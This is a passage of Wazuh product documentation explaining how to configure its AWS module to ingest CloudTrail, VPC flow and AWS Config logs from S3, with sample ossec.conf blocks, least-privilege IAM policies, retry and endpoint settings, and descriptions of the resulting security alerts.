  • regions: Works only with CloudTrail, VPC, Config buckets, and Inspector service. Use it to filter which regions Wazuh reads when you have logs from multiple regions. Separate multiple regions with commas.

  • path: If your logs are stored in a given path in an S3 bucket, this option can be specified. For example, to read logs stored in the directory vpclogs/, it is necessary to specify the path vpclogs in the Wazuh module for AWS configuration. It can also be specified with / or \.

  • aws_organization_id: This option will only work on CloudTrail buckets. If you have configured an organization, you need to specify the name of the AWS organization by using this parameter.

In the /var/ossec/etc/ossec.conf file of the Wazuh server or agent, the configuration will be similar to this.

<wodle name="aws-s3">
  <disabled>no</disabled>
  <interval>10m</interval>
  <run_on_start>yes</run_on_start>
  <skip_on_error>yes</skip_on_error>
  <!-- CloudTrail, two regions, path, account_id, organization_id and logs after January 2018 -->
  <bucket type="cloudtrail">
    <name><WAZUH_AWS_BUCKET></name>
    <aws_profile>default</aws_profile>
    <aws_account_id>123456789012</aws_account_id>
    <regions>us-east-1,us-east-2</regions>
    <path>wazuh-logs</path>
    <only_logs_after>2018-JAN-01</only_logs_after>
    <aws_organization_id>AWS-ORG-1</aws_organization_id>
  </bucket>
</wodle>
Older logs

The Wazuh module for AWS only looks for new logs in buckets based on the key of the last processed log object, which includes the datetime stamp. After the integration has processed logs, it cannot retrieve logs that are older than the processed ones, even if you respecify the only_logs_after option. The logs older than the first one processed will be ignored and not ingested into Wazuh. This is true for all supported services except the CloudWatch Logs service.

On the other hand, when monitoring the CloudWatch Logs service, the Wazuh module for AWS can process logs older than the first one processed. To do so, specify an older only_logs_after value, and the Wazuh module for AWS will process all logs between that value and the first log processed, without generating duplicate alerts.

With the following Wazuh module for AWS configuration in /var/ossec/etc/ossec.conf, the module processes CloudTrail logs from the 1st of January 2018 until the present day when executed for the first time. If you change the only_logs_after value after the first execution, the module will not process the older logs.

<wodle name="aws-s3">
  <disabled>no</disabled>
  <interval>10m</interval>
  <run_on_start>yes</run_on_start>
  <skip_on_error>yes</skip_on_error>
  <!-- CloudTrail, two regions, and logs after January 2018 -->
  <bucket type="cloudtrail">
    <name><WAZUH_AWS_BUCKET></name>
    <aws_profile>default</aws_profile>
    <regions>us-east-1,us-east-2</regions>
    <only_logs_after>2018-JAN-01</only_logs_after>
  </bucket>
</wodle>

Note

If you need to process older logs after the Wazuh module for AWS has been executed for the first time, see the Reparse section.

With the following Wazuh module for AWS configuration in the /var/ossec/etc/ossec.conf file, the module processes CloudWatch logs from the 1st of January 2018 until the present day, regardless of when it is executed.

<wodle name="aws-s3">
  <disabled>no</disabled>
  <interval>10m</interval>
  <run_on_start>yes</run_on_start>
  <skip_on_error>yes</skip_on_error>
  <!-- CloudWatch, two regions, and logs after January 2018 -->
  <service type="cloudwatchlogs">
    <aws_profile>default</aws_profile>
    <aws_log_groups>log_group1,log_group2</aws_log_groups>
    <only_logs_after>2018-JAN-01</only_logs_after>
    <regions>us-east-1,us-west-1,eu-central-1</regions>
  </service>
</wodle>
Reparse

Using the reparse option will fetch and process every log from the starting point until the present. The only_logs_after value sets the time for the starting point. If you don't provide an only_logs_after value, the Wazuh module for AWS uses the date of the first log processed as the starting point. This process may generate duplicate alerts.

To collect and process older logs loaded into the S3 bucket, you need to run the Wazuh module for AWS manually using the --reparse option. In the example below, we manually run the Wazuh module for AWS using the --reparse option on a Wazuh server.

# /var/ossec/wodles/aws/aws-s3 -b 'wazuh-example-bucket' --reparse --only_logs_after '2021-Jun-10' --debug 2

The --debug 2 parameter produces verbose output. This is useful to confirm that the script is working, especially when handling a large amount of data.

Connection configuration for retries

Some calls to AWS services may fail when made in highly congested environments. In these cases, the Boto3 client (installed as a pip dependency) raises ClientError exceptions describing the errors. Such errors can often be resolved simply by repeating the call, without further handling. To help with this, Boto3 provides a retry feature that retries client calls to AWS services when you experience errors like ThrottlingException.

Users can customize two retry configurations.

  • retry_mode: legacy, standard, and adaptive.

    • Legacy mode is the default retry mode. It sets the older version 1 for the retry handler. This includes:

      • Retry attempts for a limited number of errors/exceptions.

      • A default value of 5 for maximum call attempts.

    • Standard mode sets the updated version 2 for the retry handler. It includes:

      • Extended functionality over that found in the legacy mode where retry attempts apply to an expanded list of errors/exceptions.

      • A default value of 3 for maximum call attempts.

    • Adaptive mode is an experimental retry mode. It includes all the features of the standard mode. This mode offers flexibility in client-side retries. Retries adapt to the error/exception state response from an AWS service.

  • max_attempts: The maximum number of attempts including the initial call. This configuration can override the default value set by the retry mode.

You can specify the retry configuration in the /root/.aws/config configuration file. The profile section must include the max_attempts, retry_mode, and region settings.

It is important to use the same profile as the one you chose for your authentication method. If the authentication method does not use a profile, then the [default] profile must include these settings. If the configuration file is missing, the Wazuh module for AWS uses the following values by default:

  • retry_mode=standard

  • max_attempts=10

The following example of a /root/.aws/config file sets retry parameters for the dev profile:

[profile dev]
region=us-east-1
max_attempts=5
retry_mode=standard
Additional configuration

Wazuh supports additional configuration options in the /root/.aws/config file. The supported keys correspond to the primary keys stated in the Boto3 configuration:

  • region_name

  • signature_version

  • s3

  • proxies

  • proxies_config

  • retries

The following example of a /root/.aws/config file sets the supported configuration for the dev profile:

[profile dev]
region = us-east-1
output = json
max_attempts = 5
retry_mode = standard

dev.s3.max_concurrent_requests = 10
dev.s3.max_queue_size = 1000
dev.s3.multipart_threshold = 64MB
dev.s3.multipart_chunksize = 16MB
dev.s3.max_bandwidth = 50MB/s
dev.s3.use_accelerate_endpoint = true
dev.s3.addressing_style = virtual

dev.proxy.host = proxy.example.com
dev.proxy.port = 8080
dev.proxy.username = your-proxy-username
dev.proxy.password = your-proxy-password

dev.proxy.ca_bundle = /path/to/ca_bundle.pem
dev.proxy.client_cert = /path/to/client_cert.pem
dev.proxy.use_forwarding_for_https = true

signature_version = s3v4

Note

All s3 and proxy configuration options must be declared under a section starting with [profile <PROFILE_NAME>].

To configure multiple profiles for the integration, declare each profile section in /root/.aws/config with [profile <PROFILE_NAME>]. If you don't declare a profile section in this configuration file, Wazuh uses the default profile.
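
As an illustration, a /root/.aws/config file declaring two profiles could look like the following sketch (the profile names dev and production are only examples):

[profile dev]
region = us-east-1
retry_mode = standard
max_attempts = 5

[profile production]
region = us-east-2
retry_mode = standard
max_attempts = 5

Each profile can then be referenced from the module configuration through its own <aws_profile> tag, as in the multi-service example below.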

Configuring multiple services

Below is an example configuration for different AWS services:

<wodle name="aws-s3">
  <disabled>no</disabled>
  <interval>10m</interval>
  <run_on_start>yes</run_on_start>
  <skip_on_error>yes</skip_on_error>

  <!-- Inspector, two regions, and logs after January 2018 -->
  <service type="inspector">
    <aws_profile>default</aws_profile>
    <regions>us-east-1,us-east-2</regions>
    <only_logs_after>2018-JAN-01</only_logs_after>
  </service>

  <!-- GuardDuty, 'production' profile -->
  <bucket type="guardduty">
    <name><WAZUH_AWS_BUCKET></name>
    <path>guardduty</path>
    <aws_profile>production</aws_profile>
  </bucket>

  <!-- Config, 'default' profile -->
  <bucket type="config">
    <name><WAZUH_AWS_BUCKET></name>
    <path>config</path>
    <aws_profile>default</aws_profile>
  </bucket>

  <!-- KMS, 'dev' profile -->
  <bucket type="custom">
    <name><WAZUH_AWS_BUCKET></name>
    <path>kms_compress_encrypted</path>
    <aws_profile>dev</aws_profile>
  </bucket>

  <!-- CloudTrail, 'default' profile, without 'path' tag -->
  <bucket type="cloudtrail">
    <name><WAZUH_CLOUDTRAIL></name>
    <aws_profile>default</aws_profile>
  </bucket>

  <!-- CloudTrail, 'dev' profile, and 'us-east-1' region -->
  <bucket type="cloudtrail">
    <name><WAZUH_AWS_BUCKET></name>
    <path>dev-cloudtrail</path>
    <regions>us-east-1</regions>
    <aws_profile>dev</aws_profile>
  </bucket>

</wodle>

Where:

  • <disabled> enables or disables the Wazuh module for AWS.

  • <interval> is the time interval between module executions.

  • <run_on_start> executes the Wazuh module for AWS immediately after the Wazuh service starts.

  • <skip_on_error> skips a log that causes an error and continues processing other logs.

  • <service type> indicates the service configured. The available types are cloudwatchlogs and inspector.

  • <aws_profile> a valid profile name from the AWS credential file or config file with permission to access the service.

  • <regions> a comma-separated list of regions to limit parsing of logs.

  • <only_logs_after> parses only logs from that date onwards.

  • <bucket type> indicates the service configured.

  • <name> the name of the S3 bucket from where logs are read.

  • <path> the path or prefix for the bucket.

  • <regions> A comma-separated list of regions to limit parsing of logs. Only works with CloudTrail buckets.

Note

Check the Wazuh module for AWS reference manual to learn more about each setting.

Using VPC and FIPS endpoints

In AWS, a VPC (Virtual Private Cloud) is a virtual network dedicated to your AWS account. It provides an isolated environment where you can launch AWS resources such as EC2 instances, RDS databases, and more.

FIPS (Federal Information Processing Standards) endpoints in AWS refer to endpoints that enforce FIPS 140-2 compliance for cryptographic modules. When you enable a FIPS endpoint, AWS ensures that any cryptographic operations performed by the endpoint use FIPS 140-2 validated cryptographic libraries.

Learn how to integrate the Wazuh module for AWS with VPC and FIPS endpoints.

VPC endpoints

VPC endpoints reduce VPC traffic costs by enabling direct connections to supported AWS services, eliminating the need for public IPs.

The Wazuh module for AWS can pull logs from an AWS S3 bucket regardless of the service the logs originate from. Wazuh can utilize VPC endpoints for this purpose if it is running within a Virtual Private Cloud (VPC). The same applies to the other AWS services the Wazuh module for AWS supports, such as CloudWatchLogs, provided that they are compatible with VPC endpoints. The list of AWS services supporting VPC endpoints can be checked here.

Configure the service_endpoint and sts_endpoint tags in the /var/ossec/etc/ossec.conf file. These specify, respectively, the VPC endpoint URL used to obtain the data and the endpoint used to log into STS when an IAM role is specified.

The following is an example of a valid configuration:

<wodle name="aws-s3">
  <disabled>no</disabled>
  <interval>10m</interval>
  <run_on_start>yes</run_on_start>
  <skip_on_error>yes</skip_on_error>

  <bucket type="cloudtrail">
    <name><WAZUH_CLOUDTRAIL></name>
    <aws_profile>default</aws_profile>
    <service_endpoint>https://bucket.xxxxxx.s3.us-east-2.vpce.amazonaws.com</service_endpoint>
  </bucket>

  <bucket type="cloudtrail">
    <name>wazuh-cloudtrail-2</name>
    <aws_profile>default</aws_profile>
    <iam_role_arn>arn:aws:iam::xxxxxxxxxxx:role/wazuh-role</iam_role_arn>
    <sts_endpoint>xxxxxx.sts.us-east-2.vpce.amazonaws.com</sts_endpoint>
    <service_endpoint>https://bucket.xxxxxx.s3.us-east-2.vpce.amazonaws.com</service_endpoint>
  </bucket>

  <service type="cloudwatchlogs">
    <aws_profile>default</aws_profile>
    <regions>us-east-2</regions>
    <aws_log_groups>log_group_name</aws_log_groups>
    <service_endpoint>https://xxxxxx.logs.us-east-2.vpce.amazonaws.com</service_endpoint>
  </service>

</wodle>
FIPS endpoints

Wazuh supports the use of AWS FIPS endpoints to comply with the Federal Information Processing Standard (FIPS) Publication 140-2. Depending on the service and region of choice, a different endpoint must be selected from the AWS FIPS endpoints list. Specify the selected endpoint in the /var/ossec/etc/ossec.conf file using the service_endpoint tag.

The following is an example of a valid configuration.

<wodle name="aws-s3">
  <disabled>no</disabled>
  <interval>10m</interval>
  <run_on_start>yes</run_on_start>
  <skip_on_error>yes</skip_on_error>

  <service type="cloudwatchlogs">
    <aws_profile>default</aws_profile>
    <regions>us-east-2</regions>
    <aws_log_groups>log_group_name</aws_log_groups>
    <service_endpoint>logs-fips.us-east-2.amazonaws.com</service_endpoint>
  </service>

</wodle>
Supported services

All services except Inspector, CloudWatch Logs, and Security Lake get their data from log files stored in an S3 bucket. The buckets holding these log files are configured inside <bucket type='TYPE'> </bucket> tags. The Inspector and CloudWatch Logs services are configured inside <service type='inspector'> </service> and <service type='cloudwatchlogs'> </service> tags, respectively. To collect logs from Amazon Security Lake buckets, use <subscriber type='TYPE'> </subscriber> tags.
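
The following sketch shows how the three container tags sit inside the module block. It only reuses options already shown in this guide; refer to each service section for the settings required by a specific integration:

<wodle name="aws-s3">
  <disabled>no</disabled>
  <interval>10m</interval>
  <run_on_start>yes</run_on_start>
  <skip_on_error>yes</skip_on_error>

  <!-- Bucket-backed services (CloudTrail, VPC, Config, GuardDuty, WAF, ...) -->
  <bucket type="cloudtrail">
    <name><WAZUH_AWS_BUCKET></name>
    <aws_profile>default</aws_profile>
  </bucket>

  <!-- API-backed services (Inspector, CloudWatch Logs) -->
  <service type="cloudwatchlogs">
    <aws_profile>default</aws_profile>
    <aws_log_groups>log_group_name</aws_log_groups>
    <regions>us-east-1</regions>
  </service>

  <!-- Amazon Security Lake and custom buckets are configured with
       <subscriber type='TYPE'> tags; see the corresponding sections
       for their specific options -->
</wodle>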

The next table contains the most relevant information for configuring each service in the /var/ossec/etc/ossec.conf file, as well as the path where the logs are stored in the bucket when the corresponding service uses an S3 bucket as its storage medium:

Provider | Service | Configuration tag | Type | Path to logs | Required permission
Amazon | CloudTrail | bucket | cloudtrail | <WAZUH_AWS_BUCKET>/<prefix>/AWSLogs/<suffix>/<organization_id>/<ACCOUNT_ID>/CloudTrail/<REGION>/<year>/<month>/<day> | Policy configuration
Amazon | VPC | bucket | vpcflow | <WAZUH_AWS_BUCKET>/<prefix>/AWSLogs/<suffix>/<ACCOUNT_ID>/vpcflowlogs/<REGION>/<year>/<month>/<day> | Policy configuration
Amazon | Config | bucket | config | <WAZUH_AWS_BUCKET>/<prefix>/AWSLogs/<suffix>/<ACCOUNT_ID>/Config/<REGION>/<year>/<month>/<day> | Policy configuration
Amazon | KMS | bucket | custom | <WAZUH_AWS_BUCKET>/<prefix>/<year>/<month>/<day> | Policy configuration
Amazon | Macie | bucket | custom | <WAZUH_AWS_BUCKET>/<prefix>/<year>/<month>/<day> | Policy configuration
Amazon | Trusted Advisor | bucket | custom | <WAZUH_AWS_BUCKET>/<prefix>/<year>/<month>/<day> | Policy configuration
Amazon | GuardDuty | bucket | guardduty | <WAZUH_AWS_BUCKET>/<prefix>/<year>/<month>/<day>/<hh> | Policy configuration
Amazon | WAF | bucket | waf | <WAZUH_AWS_BUCKET>/<prefix>/<year>/<month>/<day>/<hh> | Policy configuration
Amazon | S3 Server Access logs | bucket | server_access | <WAZUH_AWS_BUCKET>/<prefix> | Policy configuration
Amazon | Inspector | service | inspector | N/A | Policy configuration
Amazon | CloudWatch Logs | service | cloudwatchlogs | N/A | Policy configuration
Amazon | Amazon ECR Image scanning | service | cloudwatchlogs | N/A | Policy configuration
Cisco | Umbrella | bucket | cisco_umbrella | <WAZUH_AWS_BUCKET>/<prefix>/<year>-<month>-<day> | Policy configuration
Amazon | ALB | bucket | alb | <WAZUH_AWS_BUCKET>/<prefix>/AWSLogs/<ACCOUNT_ID>/elasticloadbalancing/<REGION>/<year>/<month>/<day> | Policy configuration
Amazon | CLB | bucket | clb | <WAZUH_AWS_BUCKET>/<prefix>/AWSLogs/<ACCOUNT_ID>/elasticloadbalancing/<REGION>/<year>/<month>/<day> | Policy configuration
Amazon | NLB | bucket | custom | <WAZUH_AWS_BUCKET>/<prefix>/<year>/<month>/<day> | Policy configuration
Amazon | Amazon Security Lake | subscriber | security_lake | N/A | Policy configuration
Amazon | Custom Logs Buckets | subscriber | buckets | N/A | Amazon Simple Queue Service
Amazon | Security Hub | subscriber | security_hub | N/A |

(N/A: the service does not read its data from log files stored in an S3 bucket.)

AWS CloudTrail

AWS CloudTrail is a service that enables auditing of your AWS account. With CloudTrail, you can log, monitor, and retain account activity related to actions across your AWS infrastructure. This service provides the event history of your AWS account activity, such as actions taken through the AWS Management Console, AWS SDKs, command line tools, and other AWS services.

AWS configuration

The following sections cover how to configure the Amazon CloudTrail service to integrate with Wazuh.

Amazon CloudTrail configuration
  1. Create a new S3 bucket. If you want to use an already existing one, skip this step.

  2. On your AWS console, search for “cloudtrail” in the search bar at the top of the page or go to Management & Governance > CloudTrail.

  3. Click Create trail to create a new trail.

  4. Assign a Trail Name and choose the S3 bucket that will store the CloudTrail logs (remember the name you provide here, as you'll need to reference it in the Wazuh module for AWS configuration). If Log file SSE-KMS encryption is enabled, assign a name for a new AWS KMS alias or choose an existing one:

    Note

    The standard file structure AWS CloudTrail creates is the following:

    <WAZUH_AWS_BUCKET>/<PREFIX>/AWSLogs/<ACCOUNT_ID>/CloudTrail/<REGION>/<YEAR>/<MONTH>/<DAY>
    

    The structure may change depending on the service configuration or on the <WAZUH_AWS_BUCKET> and <PREFIX> values set by the user.

  5. Choose log events to be recorded and click Next.

  6. Review the configuration and click Create trail.
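
If you prefer the command line over the console steps above, the AWS CLI can create an equivalent trail. This is only a sketch, assuming the AWS CLI is installed and configured with sufficient permissions; the trail name is illustrative:

# aws cloudtrail create-trail --name wazuh-trail --s3-bucket-name <WAZUH_AWS_BUCKET>
# aws cloudtrail start-logging --name wazuh-trail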

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, the user must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket",
                "s3:DeleteObject"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. See attaching a policy to an IAM user group to learn how to attach a policy to a group. More information on other methods is available in the AWS documentation.
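
As a command line alternative, the policy can be created and attached with the AWS CLI. This is a sketch that assumes the policy document is saved as policy.json; the policy and user names are illustrative:

# aws iam create-policy --policy-name wazuh-s3-read --policy-document file://policy.json
# aws iam attach-user-policy --user-name wazuh-user --policy-arn arn:aws:iam::<ACCOUNT_ID>:policy/wazuh-s3-read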

Configure Wazuh to process AWS CloudTrail logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="cloudtrail">
        <name><WAZUH_AWS_BUCKET></name>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    

    Note

    In this example, the aws_profile authentication parameter was used. Check the credentials section to learn more about the different authentication options and how to use them.

  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
CloudTrail use cases

Below are some examples of how Wazuh integrates with CloudTrail to monitor EC2 and IAM events. This integration enhances the security monitoring capabilities of AWS environments by providing near real-time detection of security incidents and compliance violations.

EC2

Amazon EC2 (Elastic Compute Cloud) provides scalable computing capacity in the cloud. When using this service, it is highly recommended to monitor it for intrusion attempts or other unauthorized actions performed against your cloud infrastructure.

Below are some use cases for EC2 monitoring.

Run a new instance in EC2

When a user creates a new instance in EC2, a CloudTrail event is generated. As previously mentioned, the log message is collected by the Wazuh agent and forwarded to the Wazuh manager for analysis. The following alerts with rule ID 80202 will be shown on the Wazuh dashboard. They show data such as the instance type, the user who created it, and the creation date.

When a user tries to run an instance without relevant permissions, the following alert with rule ID 80203 will be shown on the Wazuh dashboard.

Start instances in EC2

When an EC2 instance is started, the following alerts with rule ID 80202 will be shown on the Wazuh dashboard. They show information such as the instance ID and the user who started it.

If a user tries to start instances without relevant permissions, the following alert will be shown on the Wazuh dashboard.

Stop instances in EC2

When an EC2 instance is stopped, the following alerts with rule ID 80202 will be shown on the Wazuh dashboard.

If a user tries to stop instances without relevant permissions, the following alert with rule ID 80203 will be shown on the Wazuh dashboard.

Create security groups in EC2

When a new EC2 security group is created, the following alert with rule ID 80202 is shown on the Wazuh dashboard. It shows information such as the user who created it and details about the security group.

Allocate a new Elastic IP address

If a new Elastic IP address is allocated, the following alert with rule ID 80202 will be shown on the Wazuh dashboard.

Associate a new Elastic IP address

If an Elastic IP address is associated, the following alert with rule ID 80202 will be shown on the Wazuh dashboard.

IAM

Identity and Access Management (IAM) allows you to create and manage AWS users and groups, and manage permissions to allow and deny their access to AWS resources. You can use the AWS IAM log data to monitor user access to AWS services and resources.

Below are some use cases for IAM events.

Create a user account

When we create a new user account in IAM, a CloudTrail event is generated. As previously mentioned, the log message is collected by the Wazuh agent, and forwarded to the Wazuh server for analysis. When a user account is created, the following alerts with rule ID 80202 will appear on the Wazuh dashboard. You can see the username of the created user, the time it was created, and who created it.

Create a user account without permissions

If an unauthorized user attempts to create new users, the following alert with rule ID 80250 will be shown on the Wazuh dashboard. It will show you which user has tried to create a user account and the username it tried to create.

User login failed

When a user tries to log in with an invalid password, the following alerts with rule ID 80254 will be shown on the Wazuh dashboard. The alerts show data such as the user who tried to log in and the browser they were using.

Possible break-in attempt

When more than four consecutive unsuccessful login attempts to the AWS console occur in a 360-second time window, the following alert with rule ID 80255 will be shown on the Wazuh dashboard.

Login success

After a successful login, the following alerts with rule ID 80253 will be shown on the Wazuh dashboard. They show the user who logged in, the browser they used, and other useful information.

You can create visualizations like this on the Wazuh dashboard for IAM events by following the custom dashboard guide:

  • Pie Chart

  • Stacked Groups

Amazon Virtual Private Cloud (VPC)

Amazon Virtual Private Cloud (Amazon VPC) lets users provision a logically isolated section of the AWS Cloud where they can launch AWS resources in a virtual network that they define. Users have complete control over their virtual networking environment, including the selection of their IP address range, creation of subnets, and configuration of route tables and network gateways. Users can use both IPv4 and IPv6 in their VPC for secure and easy access to resources and applications.

Amazon configuration

The following sections cover how to configure the Amazon VPC service to integrate with Wazuh.

  1. Go to S3 buckets, select an existing S3 bucket or create a new one, then copy the Amazon Resource Name (ARN) of the S3 bucket.

  2. On your AWS console, go to Services > Compute > EC2.

  3. Go to Network & Security > Network Interfaces on the left menu. Select a network interface and select Create flow log on the Actions menu.

  4. Change all fields to look like the following screenshot and paste the Amazon Resource Name (ARN) of the previously created bucket.
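
Alternatively, a flow log that delivers to the bucket can be created with the AWS CLI. This is a sketch that assumes the CLI has the required permissions; the network interface ID is a placeholder:

# aws ec2 create-flow-logs \
    --resource-type NetworkInterface \
    --resource-ids <NETWORK_INTERFACE_ID> \
    --traffic-type ALL \
    --log-destination-type s3 \
    --log-destination arn:aws:s3:::<WAZUH_AWS_BUCKET>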

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, the user must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket",
                "s3:DeleteObject"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. See attaching a policy to an IAM user group to learn how to attach a policy to a group. More information on other methods is available in the AWS documentation.

To allow an AWS user to execute the VPC integration, the user must also have an attached policy that includes the following statement:

{
  "Sid": "VisualEditor0",
  "Effect": "Allow",
  "Action": "ec2:DescribeFlowLogs",
  "Resource": "*"
}
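
A combined policy that merges this statement with the read-only permissions shown above could look like the following sketch. The second Sid is renamed so that both statements can coexist:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": "ec2:DescribeFlowLogs",
            "Resource": "*"
        }
    ]
}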
Configure Wazuh to process Amazon VPC logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="vpcflow">
        <name><WAZUH_AWS_BUCKET></name>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    

    Note

    In this example, the aws_profile authentication parameter was used. Check the credentials section to learn more about the different authentication options and how to use them.

  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Use cases

Using an Amazon VPC (Virtual Private Cloud), users can logically isolate some of their AWS assets from the rest of their cloud infrastructure and set up their own networks in the cloud. This is why it is usually important to monitor changes to their VPCs.

Create a VPC

If a VPC is created, the following alerts with rule ID 80202 will be shown on the Wazuh dashboard.

If a user without proper permissions attempts to create a VPC, the following alerts with rule ID 80203 will be shown on the Wazuh dashboard.

Working with VPC Data

A VPC alert contains data such as destination and source IP address, destination and source port, and how many bytes were sent.

These alerts can be easily analyzed by creating visualizations like the following one, using the custom dashboard guide.

You can monitor your network with this visualization to identify peaks. Once a peak is identified, apply filters to view the alerts generated during that time and examine the communication between IP addresses. Since the IP address is a field in numerous AWS alerts, you may discover additional alerts and gain insights into the events that occurred.

AWS Config

AWS Config is a service that enables you to assess, audit, and evaluate the configurations of your AWS resources. AWS Config continuously monitors and records your AWS resource configurations and allows you to automate the evaluation of recorded configurations against desired configurations. With AWS Config, you can review changes in configurations and relationships between AWS resources, dive into detailed resource configuration histories, and determine your overall compliance against the configurations specified in your internal guidelines. This enables you to simplify compliance auditing, security analysis, change management, and operational troubleshooting.

Amazon configuration

The following sections cover how to configure the different services required to integrate the AWS Config service with Wazuh.

Amazon Data Firehose configuration

Create an Amazon Data Firehose delivery stream to store the AWS Config events into the desired S3 bucket so Wazuh can process them.

  1. Create a new S3 bucket. If you want to use an already existing one, skip this step.

  2. On your AWS console, search for "amazon data firehose" in the search bar at the top of the page or go to Services > Analytics > Amazon Data Firehose.

  3. Click Create Firehose stream.

  4. Select Direct PUT and Amazon S3 as the desired Source and Destination, respectively.

  5. Choose an appropriate Firehose stream name.

  6. Select the desired S3 bucket as the destination. It is possible to specify a custom prefix to alter the path where AWS stores the logs. AWS Firehose creates a YYYY/MM/DD/HH file structure; if a prefix is used, the resulting structure is prefix-name/YYYY/MM/DD/HH and the prefix must be specified in the Wazuh bucket configuration. Select your preferred compression; Wazuh supports any compression type except Snappy.

  7. Create or choose an existing IAM role to be used by Amazon Data Firehose in the Advanced settings section.

  8. Click Create Firehose stream at the end of the page. The new delivery stream will be created and its details will be shown as follows.

AWS Config configuration
  1. On the AWS Config page, go to Set up AWS Config.

  2. Under Recording strategy, specify the AWS resource types you want AWS Config to record:

    • All resource types with customizable overrides

    • Specific resource types

    Note

    For more information about these options, see selecting which resources AWS Config records.

  3. Create or select an existing IAM role for AWS Config.

  4. Select an existing S3 bucket and prefix or create a new one then save your configuration.

After these steps, it is necessary to configure an Amazon EventBridge rule to send AWS Config events to the Amazon Data Firehose delivery stream created in the previous step.

Amazon EventBridge configuration

Configure an Amazon EventBridge rule to send Config events to the Amazon Data Firehose delivery stream created in the previous step.

  1. On your AWS console, search for "eventbridge" in the search bar at the top of the page or go to Services > Application Integration > EventBridge.

  2. Select EventBridge Rule and click Create rule.

  3. Assign a name to the EventBridge rule and select the Rule with an event pattern option.

  4. In the Build event pattern section, choose AWS events or EventBridge partner events as Event source.

  5. In the Event pattern section choose AWS services as Event source, Config as AWS service, and All Events as Event type. Click Next to apply the configuration.

  6. Under Select a target, choose Firehose delivery stream and select the stream created previously. Also, create a new role to access the delivery stream. Click Next to apply the configuration.

  7. Review the configuration and click Create rule.

Once the rule is created, every time an AWS Config event is sent, it will be stored in the specified S3 bucket. Remember to first enable the AWS Config service, otherwise, you won't get any data.
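
For reference, selecting AWS services, Config, and All Events in step 5 should produce an event pattern equivalent to the following; the console generates it for you:

{
  "source": ["aws.config"]
}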

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, the user must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

